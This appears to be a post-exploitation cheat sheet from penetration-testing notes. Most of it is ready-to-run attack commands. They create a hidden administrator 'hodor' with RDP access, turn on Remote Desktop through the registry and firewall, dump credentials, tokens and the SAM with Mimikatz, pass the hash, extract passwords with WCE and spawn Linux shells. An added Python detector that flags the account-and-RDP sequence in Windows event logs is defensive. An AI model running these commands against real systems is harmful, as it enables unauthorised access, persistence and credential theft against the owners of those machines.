Post exploitation
Don't stop here, you are only halfway.

Proof.txt

Linux

    cat /root/proof.txt

Windows

    type "C:\Documents and Settings\Administrator\Desktop\proof.txt"

Windows

Add RDP user

    net user hodor Qwerty123! /add
    net localgroup administrators hodor /add
    net localgroup "Remote Desktop Users" hodor /add

Enable RDP

Via registry:

    reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

Add firewall rule:

    netsh firewall set service remoteadmin enable
    netsh firewall set service remotedesktop enable
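From the defender's side, the "add RDP user" and "enable RDP" steps above leave a recognisable trail in the Windows Security log. The following is an added example (not part of the original notes) that correlates constructed events modelled on event IDs 4720 (account created), 4732 (member added to a local group) and 4657 (registry value modified; assumes object auditing is enabled on the Terminal Server key) and flags an account that is created, placed in an RDP-capable group and followed by fDenyTSConnections being set to 0 within a short window.

```python
"""Detect the 'create user -> RDP group -> enable RDP' sequence in Security events."""
from datetime import datetime, timedelta

# Local groups that grant interactive RDP access (as used in the commands above).
RDP_GROUPS = {"administrators", "remote desktop users"}

# Constructed sample events (not real log data). Field names are simplified
# stand-ins for TargetUserName / MemberName / GroupName / ObjectValueName / NewValue.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:02", "id": 4720, "user": "hodor", "by": "SYSTEM"},
    {"time": "2024-05-01T10:00:05", "id": 4732, "member": "hodor", "group": "Administrators"},
    {"time": "2024-05-01T10:00:09", "id": 4732, "member": "hodor", "group": "Remote Desktop Users"},
    {"time": "2024-05-01T10:00:15", "id": 4657, "value": "fDenyTSConnections", "new": "0",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"},
    # Benign: an admin creates a service account with no follow-up group change.
    {"time": "2024-05-01T15:30:00", "id": 4720, "user": "svc_backup", "by": "admin"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def correlate(events, window=timedelta(minutes=10)):
    """Return {user: stages} for each account created and then, within `window`,
    added to an RDP-capable group and/or followed by RDP being switched on."""
    findings = {}
    events = sorted(events, key=_ts)
    for i, e in enumerate(events):
        if e["id"] != 4720:
            continue
        user, t0 = e["user"].lower(), _ts(e)
        stages = {"created"}
        for f in events[i + 1:]:
            if _ts(f) - t0 > window:
                break  # events are sorted, nothing later can be inside the window
            if f["id"] == 4732 and f["member"].lower() == user and f["group"].lower() in RDP_GROUPS:
                stages.add("group:" + f["group"].lower())
            elif f["id"] == 4657 and f["value"].lower() == "fdenytsconnections" and f["new"] == "0":
                stages.add("rdp_enabled")
        if len(stages) > 1:  # a bare account creation on its own is not reported
            findings[user] = stages
    return findings


def severity(stages):
    """'high' when a new account got an RDP-capable group AND RDP was switched on."""
    has_group = any(s.startswith("group:") for s in stages)
    return "high" if has_group and "rdp_enabled" in stages else "medium"


if __name__ == "__main__":
    for user, stages in correlate(SAMPLE_EVENTS).items():
        print(user, severity(stages), sorted(stages))
```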

Rdesktop resolution

    rdesktop -g 1024x768 x.x.x.x

Passwords and hashes

Mimikatz

Extract passwords, keys, PIN codes and tickets from "lsass" memory:

    privilege::debug
    log sekurlsa.log
    sekurlsa::logonpasswords
Pass-the-hash (the module name is sekurlsa::pth; the original had the prefix duplicated):

    privilege::debug
    log sekurlsa.log
    sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd
Elevate token

    privilege::debug
    log sekurlsa.log
    token::elevate
Dump SAM

    privilege::debug
    log sekurlsa.log
    lsadump::sam

Windows Credential Editor (WCE)

Security tool that can be used to extract cleartext passwords and NTLM hashes from a Windows host. Administrator privileges are required.
https://www.ampliasecurity.com/research/windows-credentials-editor/

    C:\> wce -w

Networking

Is there a connection with another host?

    netstat -ano

Hosts file

    C:\WINDOWS\System32\drivers\etc\hosts

Firewall config

    netsh firewall show state
    netsh firewall show config
    netsh dump

PowerShell tools

Empire

EmpireProject/Empire (GitHub): Empire is a PowerShell and Python post-exploitation agent.

PowerSploit

PowerShellMafia/PowerSploit (GitHub): PowerSploit - A PowerShell Post-Exploitation Framework

Linux

Spawn TTY shell

    python -c 'import pty; pty.spawn("/bin/sh")'

    python -c 'import os; os.system("/bin/bash")'

    /bin/bash -i
    /bin/sh -i

    perl -e 'exec "/bin/sh";'